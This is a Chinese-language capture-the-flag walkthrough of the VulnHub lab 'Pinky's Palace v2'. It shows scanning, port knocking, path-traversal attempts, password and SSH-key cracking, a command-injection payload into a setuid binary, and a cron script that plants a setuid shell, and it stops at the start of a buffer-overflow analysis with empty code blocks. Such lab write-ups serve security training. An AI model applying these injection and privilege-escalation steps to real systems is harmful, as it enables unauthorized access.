you can download it here: https://www.vulnhub.com/entry/pinkys-palace-v2,229/

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
root@kali:~# nmap -T4 -p- -A -v 192.168.227.191
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-28 08:16 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:16
Completed NSE at 08:16, 0.00s elapsed
Initiating NSE at 08:16
Completed NSE at 08:16, 0.00s elapsed
Initiating ARP Ping Scan at 08:16
Scanning 192.168.227.191 [1 port]
Completed ARP Ping Scan at 08:16, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:16
Completed Parallel DNS resolution of 1 host. at 08:16, 0.00s elapsed
Initiating SYN Stealth Scan at 08:16
Scanning 192.168.227.191 [65535 ports]
Discovered open port 80/tcp on 192.168.227.191
Discovered open port 4655/tcp on 192.168.227.191
Discovered open port 7654/tcp on 192.168.227.191
Completed SYN Stealth Scan at 08:16, 4.24s elapsed (65535 total ports)
Initiating Service scan at 08:16
Scanning 3 services on 192.168.227.191
Completed Service scan at 08:16, 11.15s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.227.191
NSE: Script scanning 192.168.227.191.
Initiating NSE at 08:16
Completed NSE at 08:16, 0.70s elapsed
Initiating NSE at 08:16
Completed NSE at 08:16, 0.01s elapsed
Nmap scan report for 192.168.227.191
Host is up (0.00041s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 4.9.4
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Pinky's Blog – Just another WordPress site
4655/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
| ssh-hostkey:
| 2048 ac:e6:41:77:60:1f:e8:7c:02:13:ae:a1:33:09:94:b7 (RSA)
| 256 3a:48:63:f9:d2:07:ea:43:78:7d:e1:93:eb:f1:d2:3a (ECDSA)
|_ 256 b1:10:03:dc:bb:f3:0d:9b:3a:e3:e4:61:03:c8:03:c7 (ED25519)
7654/tcp open http nginx 1.10.3
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.10.3
|_http-title: 403 Forbidden
31337/tcp filtered Elite
MAC Address: 00:0C:29:45:BC:BD (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 198.841 days (since Tue Dec 11 11:06:15 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.41 ms 192.168.227.191

NSE: Script Post-scanning.
Initiating NSE at 08:16
Completed NSE at 08:16, 0.00s elapsed
Initiating NSE at 08:16
Completed NSE at 08:16, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.57 seconds
Raw packets sent: 65559 (2.885MB) | Rcvd: 65549 (2.623MB)

先看80端口,是一个wordpress,用wpscan扫了一下没有什么能直接利用的漏洞,爆破用户密码先放一放,扫目录看看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
root@kali:~# dirb http://pinkydb/ /usr/share/dirb/wordlists/big.txt -r

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Fri Jun 28 08:22:02 2019
URL_BASE: http://pinkydb/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://pinkydb/ ----
==> DIRECTORY: http://pinkydb/secret/
+ http://pinkydb/server-status (CODE:403|SIZE:295)
==> DIRECTORY: http://pinkydb/wordpress/
==> DIRECTORY: http://pinkydb/wp-admin/
==> DIRECTORY: http://pinkydb/wp-content/
==> DIRECTORY: http://pinkydb/wp-includes/

-----------------
END_TIME: Fri Jun 28 08:22:20 2019
DOWNLOADED: 20458 - FOUND: 1
root@kali:~# curl http://pinkydb/wordpress
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://pinkydb/wordpress/">here</a>.</p>
<hr>
<address>Apache/2.4.25 (Debian) Server at pinkydb Port 80</address>
</body></html>
root@kali:~# curl http://pinkydb/wordpress/
root@kali:~# curl -i http://pinkydb/wordpress/
HTTP/1.1 302 Found
Date: Fri, 28 Jun 2019 12:22:39 GMT
Server: Apache/2.4.25 (Debian)
Location: http://pinkydb/wordpress/wp-admin/setup-config.php
Content-Length: 0
Content-Type: text/html; charset=UTF-8

root@kali:~# curl http://pinkydb/secret/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /secret</title>
</head>
<body>
<h1>Index of /secret</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right"> - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="bambam.txt">bambam.txt</a></td><td align="right">2018-03-17 21:10 </td><td align="right"> 23 </td><td>&nbsp;</td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.25 (Debian) Server at pinkydb Port 80</address>
</body></html>
root@kali:~# curl http://pinkydb/secret/bambam.txt
8890
7000
666

pinkydb

两个发现:http://192.168.227.191/secret/bambam.txt 还不知道是什么东西。还有http://192.168.227.191/wordpress/ 这个仿佛是一个全新未安装的wordpress,可以自己安装然后进后台getshell

尝试安装wordpress发现wp-config.php不可写,这条路行不通了。

仔细看了下http://192.168.227.191/secret/bambam.txt,似乎是三个端口号,难道是port knocking?前面nmap扫描里有一个端口31337是filtered,用nc依次连8890,7000,666,再用nmap去扫一下发现果然31337端口打开了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
root@kali:~# nmap -T4 -p- -A -v 192.168.227.191
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-28 08:48 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:48
Completed NSE at 08:48, 0.00s elapsed
Initiating NSE at 08:48
Completed NSE at 08:48, 0.00s elapsed
Initiating ARP Ping Scan at 08:48
Scanning 192.168.227.191 [1 port]
Completed ARP Ping Scan at 08:48, 0.31s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 08:48
Scanning pinkydb (192.168.227.191) [65535 ports]
Discovered open port 80/tcp on 192.168.227.191
Discovered open port 7654/tcp on 192.168.227.191
Discovered open port 31337/tcp on 192.168.227.191
Discovered open port 4655/tcp on 192.168.227.191
Completed SYN Stealth Scan at 08:48, 2.89s elapsed (65535 total ports)
Initiating Service scan at 08:48
Scanning 4 services on pinkydb (192.168.227.191)
Completed Service scan at 08:49, 11.07s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against pinkydb (192.168.227.191)
NSE: Script scanning 192.168.227.191.
Initiating NSE at 08:49
Completed NSE at 08:49, 0.53s elapsed
Initiating NSE at 08:49
Completed NSE at 08:49, 0.01s elapsed
Nmap scan report for pinkydb (192.168.227.191)
Host is up (0.00061s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 4.9.4
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Pinky&#039;s Blog &#8211; Just another WordPress site
4655/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
| ssh-hostkey:
| 2048 ac:e6:41:77:60:1f:e8:7c:02:13:ae:a1:33:09:94:b7 (RSA)
| 256 3a:48:63:f9:d2:07:ea:43:78:7d:e1:93:eb:f1:d2:3a (ECDSA)
|_ 256 b1:10:03:dc:bb:f3:0d:9b:3a:e3:e4:61:03:c8:03:c7 (ED25519)
7654/tcp open http nginx 1.10.3
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.10.3
|_http-title: Pinkys Database
31337/tcp open Elite?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, NULL, RPCCheck:
| [+] Welcome to The Daemon [+]
| This is soon to be our backdoor
| into Pinky's Palace.
| GetRequest:
| [+] Welcome to The Daemon [+]
| This is soon to be our backdoor
| into Pinky's Palace.
| HTTP/1.0
| HTTPOptions:
| [+] Welcome to The Daemon [+]
| This is soon to be our backdoor
| into Pinky's Palace.
| OPTIONS / HTTP/1.0
| Help:
| [+] Welcome to The Daemon [+]
| This is soon to be our backdoor
| into Pinky's Palace.
| HELP
| RTSPRequest:
| [+] Welcome to The Daemon [+]
| This is soon to be our backdoor
| into Pinky's Palace.
| OPTIONS / RTSP/1.0
| SIPOptions:
| [+] Welcome to The Daemon [+]
| This is soon to be our backdoor
| into Pinky's Palace.
| OPTIONS sip:nm SIP/2.0
| Via: SIP/2.0/TCP nm;branch=foo
| From: <sip:nm@nm>;tag=root
| <sip:nm2@nm2>
| Call-ID: 50000
| CSeq: 42 OPTIONS
| Max-Forwards: 70
| Content-Length: 0
| Contact: <sip:nm@nm>
|_ Accept: application/sdp
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.70%I=7%D=6/28%Time=5D160CBB%P=i686-pc-linux-gnu%r(NUL
SF:L,59,"\[\+\]\x20Welcome\x20to\x20The\x20Daemon\x20\[\+\]\n\0This\x20is\
SF:x20soon\x20to\x20be\x20our\x20backdoor\n\0into\x20Pinky's\x20Palace\.\n
SF:=>\x20\0")%r(GetRequest,6B,"\[\+\]\x20Welcome\x20to\x20The\x20Daemon\x2
SF:0\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our\x20backdoor\n\0into\x2
SF:0Pinky's\x20Palace\.\n=>\x20\0GET\x20/\x20HTTP/1\.0\r\n\r\n")%r(SIPOpti
SF:ons,138,"\[\+\]\x20Welcome\x20to\x20The\x20Daemon\x20\[\+\]\n\0This\x20
SF:is\x20soon\x20to\x20be\x20our\x20backdoor\n\0into\x20Pinky's\x20Palace\
SF:.\n=>\x20\0OPTIONS\x20sip:nm\x20SIP/2\.0\r\nVia:\x20SIP/2\.0/TCP\x20nm;
SF:branch=foo\r\nFrom:\x20<sip:nm@nm>;tag=root\r\nTo:\x20<sip:nm2@nm2>\r\n
SF:Call-ID:\x2050000\r\nCSeq:\x2042\x20OPTIONS\r\nMax-Forwards:\x2070\r\nC
SF:ontent-Length:\x200\r\nContact:\x20<sip:nm@nm>\r\nAccept:\x20applicatio
SF:n/sdp\r\n\r\n")%r(GenericLines,5D,"\[\+\]\x20Welcome\x20to\x20The\x20Da
SF:emon\x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our\x20backdoor\n\0
SF:into\x20Pinky's\x20Palace\.\n=>\x20\0\r\n\r\n")%r(HTTPOptions,6F,"\[\+\
SF:]\x20Welcome\x20to\x20The\x20Daemon\x20\[\+\]\n\0This\x20is\x20soon\x20
SF:to\x20be\x20our\x20backdoor\n\0into\x20Pinky's\x20Palace\.\n=>\x20\0OPT
SF:IONS\x20/\x20HTTP/1\.0\r\n\r\n")%r(RTSPRequest,6F,"\[\+\]\x20Welcome\x2
SF:0to\x20The\x20Daemon\x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our
SF:\x20backdoor\n\0into\x20Pinky's\x20Palace\.\n=>\x20\0OPTIONS\x20/\x20RT
SF:SP/1\.0\r\n\r\n")%r(RPCCheck,5A,"\[\+\]\x20Welcome\x20to\x20The\x20Daem
SF:on\x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our\x20backdoor\n\0in
SF:to\x20Pinky's\x20Palace\.\n=>\x20\0\x80")%r(DNSVersionBindReqTCP,59,"\[
SF:\+\]\x20Welcome\x20to\x20The\x20Daemon\x20\[\+\]\n\0This\x20is\x20soon\
SF:x20to\x20be\x20our\x20backdoor\n\0into\x20Pinky's\x20Palace\.\n=>\x20\0
SF:")%r(DNSStatusRequestTCP,59,"\[\+\]\x20Welcome\x20to\x20The\x20Daemon\x
SF:20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our\x20backdoor\n\0into\x
SF:20Pinky's\x20Palace\.\n=>\x20\0")%r(Help,5F,"\[\+\]\x20Welcome\x20to\x2
SF:0The\x20Daemon\x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our\x20ba
SF:ckdoor\n\0into\x20Pinky's\x20Palace\.\n=>\x20\0HELP\r\n");
MAC Address: 00:0C:29:45:BC:BD (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.022 days (since Fri Jun 28 08:17:16 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.62 ms pinkydb (192.168.227.191)

NSE: Script Post-scanning.
Initiating NSE at 08:49
Completed NSE at 08:49, 0.00s elapsed
Initiating NSE at 08:49
Completed NSE at 08:49, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.08 seconds
Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

31337端口看上去不知道是干什么的,nc上去敲一个字符,他就回显一个字符然后断开连接。先看7654上的nginx

首页403,用dirb扫了下只发现有apache这个目录,再用dirb扫描的时候发现有趣的事情了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
root@kali:~# dirb http://192.168.227.191:7654/apache/ /usr/share/dirb/wordlists/big.txt -r

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Fri Jun 28 09:08:41 2019
URL_BASE: http://192.168.227.191:7654/apache/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://192.168.227.191:7654/apache/ ----
+ http://192.168.227.191:7654/apache/.htaccess (CODE:200|SIZE:235)
==> DIRECTORY: http://192.168.227.191:7654/apache/secret/
==> DIRECTORY: http://192.168.227.191:7654/apache/wordpress/
==> DIRECTORY: http://192.168.227.191:7654/apache/wp-admin/
==> DIRECTORY: http://192.168.227.191:7654/apache/wp-content/
==> DIRECTORY: http://192.168.227.191:7654/apache/wp-includes/

-----------------
END_TIME: Fri Jun 28 09:08:57 2019
DOWNLOADED: 20458 - FOUND: 1

这不是80端口上的内容吗,看来nginx是做了配置将apache作为alias映射到apache的web server document root上,试了下有没有path normalization的问题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
root@kali:~# curl http://192.168.227.191:7654/apache../../etc/passwd
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.10.3</center>
</body>
</html>
root@kali:~# curl http://192.168.227.191:7654/apache../../../etc/passwd
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.10.3</center>
</body>
</html>
root@kali:~# curl http://192.168.227.191:7654/apache../../../../etc/passwd
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.10.3</center>
</body>
</html>
root@kali:~# curl http://192.168.227.191:7654/apache../../../../../etc/passwd
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.10.3</center>
</body>
</html>
root@kali:~# curl http://192.168.227.191:7654/apache../../../../../../etc/passwd

似乎没有这个问题。

卡住了很久,再去看作者的说明,发现是要将ip绑定在pinkydb上,难怪我说wordpress网站上怎么那么多资源加载不出来。在/etc/hosts里添加一条记录192.168.227.191 pinkydb 再去访问http://pinkydb:7654/就正常了

1

尝试爆破无果,转去用cewl来制作字典了。cewl -m 5 -w pass.txt http://pinkydb/

2

爆破成功

3

有个很明显的本地包含漏洞,但是不费劲了,直接给了私钥,notes里说明了用户名是stefano,也从/etc/passwd的内容中得到印证

1
2
3
4
root@kali:~/Downloads# chmod 600 id_rsa
root@kali:~/Downloads# ssh -i id_rsa -p 4655 stegano@192.168.227.191
Enter passphrase for key 'id_rsa':

还需要passphrase,用ssh2john配合john来破解吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
root@kali:~/Downloads# locate ssh2john
/usr/share/john/ssh2john.py
root@kali:~/Downloads# python /usr/share/john/ssh2john.py id_rsa > hashes
root@kali:~/Downloads# john --wordlist=/root/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/32])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
secretz101 (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:06 DONE (2019-06-28 11:41) 0.1451g/s 2081Kp/s 2081Kc/s 2081KC/sa6_123..*7¡Vamos!
Session completed
root@kali:~/Downloads# ssh -i id_rsa -p 4655 stefano@192.168.227.191
Enter passphrase for key 'id_rsa':
Linux Pinkys-Palace 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Mar 17 21:18:01 2018 from 172.19.19.2
stefano@Pinkys-Palace:~$

1
2
3
4
5
6
7
8
9
10
stefano@Pinkys-Palace:~$ ls
tools
stefano@Pinkys-Palace:~$ cd tools
stefano@Pinkys-Palace:~/tools$ ls -al
total 28
drwxr-xr-x 2 stefano stefano 4096 Mar 17 2018 .
drwxr-xr-x 4 stefano stefano 4096 Mar 17 2018 ..
-rw-r--r-- 1 stefano stefano 65 Mar 16 2018 note.txt
-rwsr----x 1 pinky www-data 13384 Mar 16 2018 qsub

qsub设置了suid位,owner为pinky,很显然,需要利用qsub来得到pinky的shell。

下载回本地分析一下,注意到others只可执行不可读,需要用前面的文件包含来下载这个文件,直接拖进idapro

4

先验证密码,密码是环境变量$TERM的值,然后调用send函数

5

很明显有一个命令注入。

1
2
3
4
5
6
7
[+] Welcome to Question Submit!stefano@Pinkys-Palace:~/tools$ echo $TERM
xterm
stefano@Pinkys-Palace:~/tools$ ./qsub "asdf;whoami;"
[+] Input Password: xterm
asdf
pinky

成功执行whoami命令

1
2
3
4
5
stefano@Pinkys-Palace:~/tools$ ./qsub "asdf;/bin/bash;"
[+] Input Password: xterm
asdf
pinky@Pinkys-Palace:~/tools$

成功拿到pinky的shell。很自然的想到去读pinky的.bash_history

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
pinky@Pinkys-Palace:/home/pinky$ cat .bash_history 
ls -al
cd
ls -al
cd /usr/local/bin
ls -al
vim backup.sh
su demon
pinky@Pinkys-Palace:/home/pinky$ cd /usr/local/bin
pinky@Pinkys-Palace:/usr/local/bin$ ls
backup.sh
pinky@Pinkys-Palace:/usr/local/bin$ ls -al
total 12
drwxrwsr-x 2 root staff 4096 Mar 17 2018 .
drwxrwsr-x 10 root staff 4096 Mar 17 2018 ..
-rwxrwx--- 1 demon pinky 113 Mar 17 2018 backup.sh

目测这个backup.sh是计划任务会定时执行的,那直接去修改这个backup.sh好了

1
2
3
4
5
6
7
8
9
10
11
12
13
demon@Pinkys-Palace:~$ cat /usr/local/bin/backup.sh 
#!/bin/bash

rm /home/demon/backups/backup.tar.gz
tar cvzf /home/demon/backups/backup.tar.gz /var/www/html
cp /bin/dash /tmp/sh
chown demon:demon /tmp/sh
chmod ugo+x /tmp/sh
chmod u+s /tmp/sh
#
#
#

得到demon的shell之后就是提权到root了

逛了一圈,最后在查看root运行的程序的时候ps aux | grep root 发现了端倪

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
demon@Pinkys-Palace:/daemon$ ps aux | grep root
root 1 0.0 0.3 138828 6616 ? Ss 05:12 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S 05:12 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 05:12 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< 05:12 0:00 [kworker/0:0H]
root 7 0.0 0.0 0 0 ? S 05:12 0:00 [rcu_sched]
root 8 0.0 0.0 0 0 ? S 05:12 0:00 [rcu_bh]
root 9 0.0 0.0 0 0 ? S 05:12 0:00 [migration/0]
root 10 0.0 0.0 0 0 ? S< 05:12 0:00 [lru-add-drain]
root 11 0.0 0.0 0 0 ? S 05:12 0:00 [watchdog/0]
root 12 0.0 0.0 0 0 ? S 05:12 0:00 [cpuhp/0]
root 13 0.0 0.0 0 0 ? S 05:12 0:00 [cpuhp/1]
root 14 0.0 0.0 0 0 ? S 05:12 0:00 [watchdog/1]
root 15 0.0 0.0 0 0 ? S 05:12 0:00 [migration/1]
root 16 0.0 0.0 0 0 ? S 05:12 0:00 [ksoftirqd/1]
root 18 0.0 0.0 0 0 ? S< 05:12 0:00 [kworker/1:0H]
root 19 0.0 0.0 0 0 ? S 05:12 0:00 [kdevtmpfs]
root 20 0.0 0.0 0 0 ? S< 05:12 0:00 [netns]
root 21 0.0 0.0 0 0 ? S 05:12 0:00 [khungtaskd]
root 22 0.0 0.0 0 0 ? S 05:12 0:00 [oom_reaper]
root 23 0.0 0.0 0 0 ? S< 05:12 0:00 [writeback]
root 24 0.0 0.0 0 0 ? S 05:12 0:00 [kcompactd0]
root 26 0.0 0.0 0 0 ? SN 05:12 0:00 [ksmd]
root 27 0.0 0.0 0 0 ? SN 05:12 0:00 [khugepaged]
root 28 0.0 0.0 0 0 ? S< 05:12 0:00 [crypto]
root 29 0.0 0.0 0 0 ? S< 05:12 0:00 [kintegrityd]
root 30 0.0 0.0 0 0 ? S< 05:12 0:00 [bioset]
root 31 0.0 0.0 0 0 ? S< 05:12 0:00 [kblockd]
root 32 0.0 0.0 0 0 ? S< 05:12 0:00 [devfreq_wq]
root 33 0.0 0.0 0 0 ? S< 05:12 0:00 [watchdogd]
root 34 0.0 0.0 0 0 ? S 05:12 0:00 [kswapd0]
root 35 0.0 0.0 0 0 ? S< 05:12 0:00 [vmstat]
root 47 0.0 0.0 0 0 ? S< 05:12 0:00 [kthrotld]
root 49 0.0 0.0 0 0 ? S< 05:12 0:00 [ipv6_addrconf]
root 91 0.0 0.0 0 0 ? S< 05:12 0:00 [mpt_poll_0]
root 93 0.0 0.0 0 0 ? S< 05:12 0:00 [ata_sff]
root 95 0.0 0.0 0 0 ? S< 05:12 0:00 [mpt/0]
root 122 0.0 0.0 0 0 ? S 05:12 0:00 [scsi_eh_0]
root 123 0.0 0.0 0 0 ? S< 05:12 0:00 [scsi_tmf_0]
root 124 0.0 0.0 0 0 ? S< 05:12 0:00 [bioset]
root 125 0.0 0.0 0 0 ? S 05:12 0:00 [scsi_eh_1]
root 126 0.0 0.0 0 0 ? S< 05:12 0:00 [scsi_tmf_1]
root 127 0.0 0.0 0 0 ? S 05:12 0:00 [scsi_eh_2]
root 128 0.0 0.0 0 0 ? S< 05:12 0:00 [scsi_tmf_2]
root 148 0.0 0.0 0 0 ? S< 05:12 0:00 [kworker/0:1H]
root 149 0.0 0.0 0 0 ? S< 05:12 0:00 [kworker/1:1H]
root 182 0.0 0.0 0 0 ? S 05:12 0:00 [jbd2/sda1-8]
root 183 0.0 0.0 0 0 ? S< 05:12 0:00 [ext4-rsv-conver]
root 215 0.0 0.2 51188 5648 ? Ss 05:12 0:00 /lib/systemd/systemd-journald
root 216 0.0 0.0 0 0 ? S 05:12 0:00 [kauditd]
root 230 0.0 0.2 47276 5536 ? Ss 05:12 0:00 /lib/systemd/systemd-udevd
root 304 0.0 0.0 0 0 ? S< 05:12 0:00 [nfit]
root 310 0.0 0.0 0 0 ? S< 05:12 0:00 [ttm_swap]
root 442 0.0 0.1 29664 2864 ? Ss 05:12 0:00 /usr/sbin/cron -f
root 443 0.0 0.1 250116 3324 ? Ssl 05:12 0:00 /usr/sbin/rsyslogd -n
root 454 0.0 0.2 46520 4752 ? Ss 05:12 0:00 /lib/systemd/systemd-logind
root 470 0.0 1.3 235880 26812 ? Ss 05:12 0:00 php-fpm: master process (/etc/php/7.0/fpm/php-fpm.conf)
root 477 0.0 0.0 4040 904 ? Ss 05:12 0:00 /daemon/panel
root 489 0.0 0.0 14536 1692 tty1 Ss+ 05:12 0:00 /sbin/agetty --noclear tty1 linux
root 496 0.0 0.3 69944 6324 ? Ss 05:12 0:00 /usr/sbin/sshd -D
root 517 0.0 0.0 159504 1676 ? Ss 05:12 0:00 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
root 537 0.0 1.2 277864 25876 ? Ss 05:12 0:00 /usr/sbin/apache2 -k start
root 638 0.0 0.0 8572 780 ? Ss 05:12 0:00 /usr/sbin/knockd -i ens33
root 702 0.0 0.1 20472 3004 ? Ss 05:12 0:00 /sbin/dhclient -4 -v -pf /run/dhclient.ens33.pid -lf /var/lib/dhcp/dhclient.ens33.leases -I -df /var/lib/dhcp/dhclient6.ens33.leases ens33
root 1076 0.0 0.0 4040 84 ? S 05:56 0:00 /daemon/panel
root 14100 0.0 0.0 0 0 ? S 07:09 0:00 [kworker/0:2]
root 14591 0.0 0.0 0 0 ? S 08:44 0:00 [kworker/0:3]
root 14761 0.0 0.0 0 0 ? S 09:09 0:00 [kworker/1:0]
root 14868 0.0 0.0 0 0 ? S 09:30 0:00 [kworker/u256:0]
root 15013 0.0 0.0 0 0 ? S 09:39 0:00 [kworker/1:1]
root 15046 0.0 0.0 0 0 ? S 09:46 0:00 [kworker/u256:2]
root 15125 0.0 0.3 95172 6772 ? Ss 09:53 0:00 sshd: demon [priv]
root 15155 0.0 0.0 0 0 ? S 09:54 0:00 [kworker/1:2]
root 15158 0.0 0.0 0 0 ? S 09:54 0:00 [kworker/0:0]
root 15159 0.0 0.0 0 0 ? S 09:54 0:00 [kworker/1:3]
root 15181 0.0 0.0 0 0 ? S 09:55 0:00 [kworker/u256:1]
demon 15198 0.0 0.0 12784 984 pts/1 R+ 09:58 0:00 grep root

有一个/daemon/panel是以root用户运行的,联想到前面的31337端口,猜测这就是31337端口上运行的程序,下载下来分析

6

7

看见handlecmd里调用了strcpy,很自然的想到溢出漏洞,放在本地打开gdb调一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
